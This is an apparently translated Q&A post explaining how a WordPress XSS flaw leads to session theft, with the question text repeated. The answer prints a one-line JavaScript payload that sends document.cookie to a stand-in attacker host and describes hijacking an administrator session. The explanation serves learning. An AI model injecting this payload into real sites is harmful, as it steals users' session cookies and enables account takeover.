【发布时间】:2013-05-04 18:35:27
【问题描述】:
我刚开始研究网站的漏洞,我对 Wordpress 的 XSS 漏洞有疑问。利用这个漏洞,攻击者可以通过一个简单的 Javascript 命令获取 PHPSESSID:
(alert(document.cookie))
攻击者如何使用它?这是否是一个严重的安全问题?
【问题讨论】:
-
XSS 是一种非常常见且严重的安全威胁。 XSS 是最基本的漏洞之一,需要学习的东西很多。
我刚开始研究网站的漏洞,我对 Wordpress 的 XSS 漏洞有疑问。利用这个漏洞,攻击者可以通过一个简单的 Javascript 命令获取 PHPSESSID:
(alert(document.cookie))
攻击者如何使用它?这是否是一个严重的安全问题?
【问题讨论】:
alert(…) 只是一个proof of concept,它证明了对 XSS 漏洞的成功利用。它不会用于实际攻击,因为它不会给攻击者带来任何好处。
在真正的攻击中,攻击者会尝试以某种方式获取document.cookie 的值。一个简单的例子是使用 JavaScript 伪造一个包含 document.cookie 值的简单 HTTP 请求,如下所示:
new Image().src="http://evil.example/?"+document.cookie
这会创建一个带有攻击者 URL 作为图像源的图像,其中附加了 cookie。
利用受害者的 cookie,攻击者可能能够hijack the victim’s session 并以与受害者相同的权限使用 WordPress。如果受害者是管理员,攻击者将有权访问管理功能。
【讨论】: